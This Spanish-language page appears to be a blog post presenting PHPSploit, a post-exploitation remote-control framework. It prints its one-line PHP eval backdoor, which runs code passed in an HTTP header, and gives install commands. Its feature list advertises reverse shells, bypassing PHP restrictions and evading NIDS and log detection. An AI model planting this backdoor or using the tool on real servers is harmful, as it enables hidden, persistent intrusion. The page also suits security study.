PHPSploit Framework Sigilo Post-Explotación
PHPSploit Framework Sigilo Post-Explotación

PHPSploit: Framework de Sigilo Post-Explotación

PhpSploit es un framework de control remoto, con el objetivo de proporcionar una conexión sigilosa interactiva tipo shell sobre HTTP entre el cliente y el servidor web. Es una herramienta de post-explotación capaz de mantener el acceso a un servidor web comprometido para propósitos de escalada de privilegios.

La comunicación ofuscada se lleva a cabo utilizando cabeceras HTTP bajo peticiones de clientes estándar y respuestas relativas del servidor web, tunelizadas a través de una diminuta puerta trasera polimórfica:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Demo PHPSploit
Demo PHPSploit

Inicio Rápido

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Características

  • Eficiente: Más de 20 plugins para automatizar las tareas de escalada de privilegios
    • Ejecutar comandos y navegar por el sistema de archivos, pasando por encima de las restricciones de seguridad de PHP
    • Subir/Descargar archivos entre el cliente y el objetivo
    • Editar archivos remotos a través del editor de texto local
    • Ejecutar la consola SQL en el sistema de destino
    • Desprender shells TCP inversos
  • Sigilo: El framework está hecho por paranoicos, para paranoicos
    • Casi invisible por el análisis de los registros y la detección de la firma NIDS
    • Modo seguro y bypass de restricciones de seguridad PHP comunes
    • Las comunicaciones están ocultas en las cabeceras HTTP
    • Las cargas útiles cargadas se ofuscan para bypass NIDS
    • http/https/socks4/socks5 Soporte de proxy
  • Conveniente: Una interfaz robusta con muchas características cruciales
    • Ayuda detallada para cualquier opción (comando help)
    • Plataforma cruzada tanto en el cliente como en el servidor.
    • El CLI soporta autocompletado y multi-comando
    • Función de guardado/carga de sesión e historial persistente
    • Soporte de múltiples solicitudes para grandes cargas útiles (como las cargas)
    • Proporciona un potente motor de ajustes altamente configurable
    • Cada ajuste, como user-agent tiene un modo polimórfico
    • Variables de entorno personalizables para la interacción de los plugins
    • Proporciona una completa API de desarrollo de plugins

Plataformas soportadas (como atacante):

  • GNU/Linux
  • Mac OS X

Plataformas soportadas (como objetivo):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT
Dark Mode

phpsploit (este enlace se abre en una nueva ventana) por nil0x42 (este enlace se abre en una nueva ventana)

Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor

Más artículos
Katana: Herramienta Python para Google Hacking